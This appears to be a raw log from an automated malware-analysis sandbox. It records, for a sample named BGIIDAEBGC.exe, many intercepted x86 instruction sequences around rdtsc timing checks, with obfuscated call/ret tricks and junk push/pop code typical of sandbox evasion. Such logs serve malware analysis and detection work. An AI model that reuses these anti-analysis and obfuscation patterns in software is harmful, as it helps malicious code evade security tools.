Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CEEBB second address: 6CEEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CEEC1 second address: 6CEEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CEEC5 second address: 6CEEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CFDC0 second address: 6CFE10 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F69D121AB2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c xor dword ptr [ebp+1245116Bh], eax 0x00000012 mov dword ptr [ebp+122D2FD5h], eax 0x00000018 popad 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D35A9h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F69D121AB28h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 pop eax 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CFE10 second address: 6CFE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CFE14 second address: 6CFE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D0F02 second address: 6D0F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CFFD8 second address: 6CFFE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D0F10 second address: 6D0F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CFFE2 second address: 6D0054 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F69D121AB28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F69D121AB28h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e jo 00007F69D121AB28h 0x00000054 mov ebx, edx 0x00000056 mov eax, dword ptr [ebp+122D1745h] 0x0000005c mov ebx, esi 0x0000005e push FFFFFFFFh 0x00000060 sub dword ptr [ebp+12466037h], edx 0x00000066 push eax 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D1EE1 second address: 6D1EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D1EE5 second address: 6D1EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D1EE9 second address: 6D1F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F69D1080A4Fh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F69D1080A52h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D1F16 second address: 6D1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 call 00007F69D121AB2Ch 0x0000000c mov ebx, dword ptr [ebp+122D2AA4h] 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 jp 00007F69D121AB32h 0x0000001b mov di, 98B8h 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D1ACBh] 0x00000027 push eax 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D11D6 second address: 6D11E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D312E second address: 6D3134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D85DD second address: 6D85E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D9616 second address: 6D96A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 jns 00007F69D121AB26h 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F69D121AB28h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007F69D121AB32h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F69D121AB28h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+12447883h] 0x00000054 movzx ebx, bx 0x00000057 push 00000000h 0x00000059 jno 00007F69D121AB2Ch 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jo 00007F69D121AB26h 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DA7E9 second address: 6DA806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DA806 second address: 6DA818 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F69D121AB2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DB8E8 second address: 6DB8EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DE943 second address: 6DE9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 jno 00007F69D121AB2Ch 0x0000000f pop eax 0x00000010 nop 0x00000011 sub dword ptr [ebp+12452A61h], eax 0x00000017 sub dword ptr [ebp+122D36EAh], eax 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F69D121AB28h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F69D121AB28h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 adc ebx, 618DB291h 0x0000005b push eax 0x0000005c jo 00007F69D121AB34h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DE9B6 second address: 6DE9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E1E11 second address: 6E1E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F69D121AB26h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F69D121AB36h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E1E36 second address: 6E1E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A56h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E32C6 second address: 6E32E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F69D121AB34h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6D87F9 second address: 6D8886 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F69D1080A4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2AA0h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F69D1080A48h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 cmc 0x0000003a mov eax, dword ptr [ebp+122D05D5h] 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007F69D1080A48h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a mov ebx, esi 0x0000005c push FFFFFFFFh 0x0000005e or dword ptr [ebp+1247009Fh], eax 0x00000064 nop 0x00000065 push edx 0x00000066 jl 00007F69D1080A48h 0x0000006c pushad 0x0000006d popad 0x0000006e pop edx 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F69D1080A4Ah 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DA919 second address: 6DA91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DA91F second address: 6DA923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DBB4E second address: 6DBB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DCB1C second address: 6DCB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6DCBD9 second address: 6DCBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E8E2E second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F69D1080A57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E8F8B second address: 6E8F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E8F92 second address: 6E8FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F69D1080A46h 0x0000000a jng 00007F69D1080A46h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E9153 second address: 6E9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6E9159 second address: 6E915D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 67EBC6 second address: 67EBE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F69D121AB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 67EBE4 second address: 67EBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F69D1080A54h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 67EBFF second address: 67EC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 67EC03 second address: 67EC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F69D1080A4Eh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F69D1080A46h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F0094 second address: 6F00E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F69D121AB39h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F69D121AB30h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 jmp 00007F69D121AB38h 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F01F8 second address: 6F0229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jmp 00007F69D1080A4Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F0229 second address: 6F0243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F69D121AB26h 0x00000009 jng 00007F69D121AB26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F0243 second address: 6F0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F0247 second address: 6F0251 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F03EB second address: 6F03FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F3D77 second address: 6F3D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F69D121AB2Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4512 second address: 6F452A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F69D1080A4Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F452A second address: 6F4532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4532 second address: 6F4537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4537 second address: 6F4550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB35h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4C04 second address: 6F4C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4C08 second address: 6F4C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4C14 second address: 6F4C19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4D8B second address: 6F4D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6F4D91 second address: 6F4D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAA22 second address: 6CAA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CADB5 second address: 6CADD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAE50 second address: 6CAE66 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F69D121AB2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAE66 second address: 6CAE70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAE70 second address: 6CAE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F69D121AB35h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jne 00007F69D121AB26h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAE9C second address: 6CAECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F69D1080A50h 0x00000012 pop eax 0x00000013 push BA778F16h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CAFA9 second address: 6CAFC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB0F2 second address: 6CB10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A57h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB1D0 second address: 6CB1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB1D6 second address: 6CB1E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F69D1080A46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB9E8 second address: 6CB9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CB9EC second address: 6CBA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F69D1080A59h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CBA12 second address: 6CBA5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov di, dx 0x0000000f mov dword ptr [ebp+124494B1h], eax 0x00000015 lea eax, dword ptr [ebp+1247F69Bh] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F69D121AB28h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push ecx 0x00000036 add ecx, 4403DC91h 0x0000003c pop edi 0x0000003d movsx edi, cx 0x00000040 nop 0x00000041 push ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 6CBA5E second address: 6CBA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
